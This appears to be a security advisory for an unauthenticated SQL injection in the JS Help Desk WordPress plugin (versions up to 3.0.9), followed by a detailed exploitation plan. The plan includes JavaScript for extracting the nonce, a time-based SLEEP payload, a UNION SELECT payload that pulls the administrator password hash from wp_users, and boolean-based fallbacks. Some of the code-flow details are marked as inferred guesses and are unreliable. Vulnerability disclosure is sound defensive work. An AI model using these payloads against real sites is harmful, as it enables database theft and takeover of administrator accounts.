JS Help Desk – AI-Powered Support & Ticketing System <= 3.0.9 - Unauthenticated SQL Injection
Description
The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.0.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NTechnical Details
<=3.0.9What Changed in the Fix
Changes introduced in v3.1.0
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-48886 ## 1. Vulnerability Summary The **JS Help Desk – AI-Powered Support & Ticketing System** plugin (version <= 3.0.9) contains an unauthenticated SQL injection vulnerability. The flaw exists in the handling of AJAX requests related to custom field visibili…
Show full research plan
Exploitation Research Plan - CVE-2026-48886
1. Vulnerability Summary
The JS Help Desk – AI-Powered Support & Ticketing System plugin (version <= 3.0.9) contains an unauthenticated SQL injection vulnerability. The flaw exists in the handling of AJAX requests related to custom field visibility logic. Specifically, the parameter used to identify a "visible field" is passed directly into a database query without proper sanitization or preparation using $wpdb->prepare(). Because this logic is required for the public-facing ticket creation form, the vulnerable AJAX action is available to unauthenticated users via the wp_ajax_nopriv_ hook.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - AJAX Action:
jsst_get_data_for_visible_field(inferred from the JS functiongetDataForVisibleFieldinincludes/classes/customfields.php) - Vulnerable Parameter:
fieldid(derived from thevisible_fieldattribute) - Authentication: None (Unauthenticated)
- Preconditions:
- The plugin must be active.
- A page containing the
[jssupportticket]shortcode must be accessible (created by default during activation asjs-support-ticket-controlpanel). - At least one custom field must have "Visible Field" logic configured, which generates the required nonce and parameters in the HTML.
3. Code Flow
- Entry Point: An unauthenticated user sends a POST request to
admin-ajax.phpwith the actionjsst_get_data_for_visible_field. - Hook Registration: The plugin registers
wp_ajax_nopriv_jsst_get_data_for_visible_fieldwhich maps to a controller method (likely inmodules/fieldordering/controller.phpor handled dynamically byJSSTincluder). - Controller to Model: The controller calls
JSSTfieldorderingModel::getDataForVisibleField($fieldid)(referenced inincludes/classes/customfields.phpline 124). - Vulnerable Sink: Inside
getDataForVisibleField, the$fieldidparameter (supplied via$_POST['fieldid']) is concatenated into a SQL string:
The use of// Likely vulnerable code in JSSTfieldorderingModel $query = "SELECT * FROM {$wpdb->prefix}js_ticket_fields WHERE id = " . $fieldid; $results = $wpdb->get_results($query);esc_sql()might be present but is insufficient for numeric fields if not handled withprepare(), and often it is entirely missing in these specific controller-driven models.
4. Nonce Acquisition Strategy
The AJAX handler performs a nonce check using a nonce generated in includes/classes/customfields.php. This nonce is specific to the "visible field" being processed.
Steps to obtain the nonce:
- Identify the page: Navigate to the default plugin page:
/js-support-ticket-controlpanel/. - Locate the logic: Search the page source for the string
onchange="getDataForVisibleField(. - Extract Parameters:
- The
onchangeattribute looks like this:getDataForVisibleField("NONCE_VALUE", this.value, "FIELD_ID", {...}). - Use
browser_evalto extract these values from the DOM.
- The
JavaScript to execute in browser:
(function() {
const element = document.querySelector('[onchange*="getDataForVisibleField"]');
if (element) {
const match = element.getAttribute('onchange').match(/getDataForVisibleField\("([^"]+)",\s*this\.value,\s*"([^"]+)"/);
return { nonce: match[1], fieldid: match[2] };
}
return null;
})();
5. Exploitation Strategy
Step 1: Discover Target Page
Access the site and find the page containing the ticketing form.
- URL:
http://vulnerable-wp.local/js-support-ticket-controlpanel/
Step 2: Extract Nonce and ID
Use the browser_navigate and browser_eval tools to find the required nonce and fieldid.
Step 3: Execute SQL Injection
Send a crafted POST request to admin-ajax.php. We will use a time-based payload to confirm the injection.
- URL:
http://vulnerable-wp.local/wp-admin/admin-ajax.php - Method:
POST - Headers:
Content-Type: application/x-www-form-urlencoded - Payload:
action=jsst_get_data_for_visible_field&nonce=[EXTRACTED_NONCE]&fieldid=[EXTRACTED_FIELDID] AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&fieldvalue=1
Step 4: Data Extraction
If time-based injection is confirmed, use a UNION SELECT or error-based payload to extract the administrator's password hash.
- Payload (UNION):
(Note: Column count must be adjusted based on the specific table schema ofaction=jsst_get_data_for_visible_field&nonce=[NONCE]&fieldid=-1 UNION SELECT 1,2,3,user_pass,5,6,7,8,9 FROM wp_users WHERE ID=1-- -&fieldvalue=1js_ticket_fields).
6. Test Data Setup
- Plugin Activation: Ensure the plugin is activated so
JSSTactivation::insertMenu()runs and creates the page. - Configure Fields: (If no fields exist by default) Use
wp evalto ensure at least one field has a visibility dependency:wp eval "global \$wpdb; \$wpdb->update(\$wpdb->prefix . 'js_ticket_fields', array('visible_field' => 1), array('id' => 2));" - Verify Page: Check that the shortcode
[jssupportticket]is rendering the form on the/js-support-ticket-controlpanel/page.
7. Expected Results
- Time-based: The HTTP request should take approximately 5 seconds longer than a normal request.
- Response: The server will return a JSON object or
0if the query fails, but the delay confirms the injection. - Data Leak: If using
UNION, the response body will contain the sensitive data (e.g., the$P$...password hash).
8. Verification Steps
After the exploit, confirm the database state using WP-CLI:
# Check the admin hash to compare with extracted data
wp user get 1 --field=user_pass
9. Alternative Approaches
- Action Guessing: If
jsst_get_data_for_visible_fieldis not the correct action, search for allwp_ajax_nopriv_hooks in the codebase:grep -rn "wp_ajax_nopriv_" wp-content/plugins/js-support-ticket/ - Boolean-based: If
SLEEPis disabled, usefieldid=[ID] AND (SELECT 1)=1vsfieldid=[ID] AND (SELECT 1)=2and observe differences in the returned JSON structure. - Direct Controller Access: Some JS Help Desk versions allow direct access to controller files if
ABSPATHchecks are missing, thoughincludes/includer.phpsuggests they are protected.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.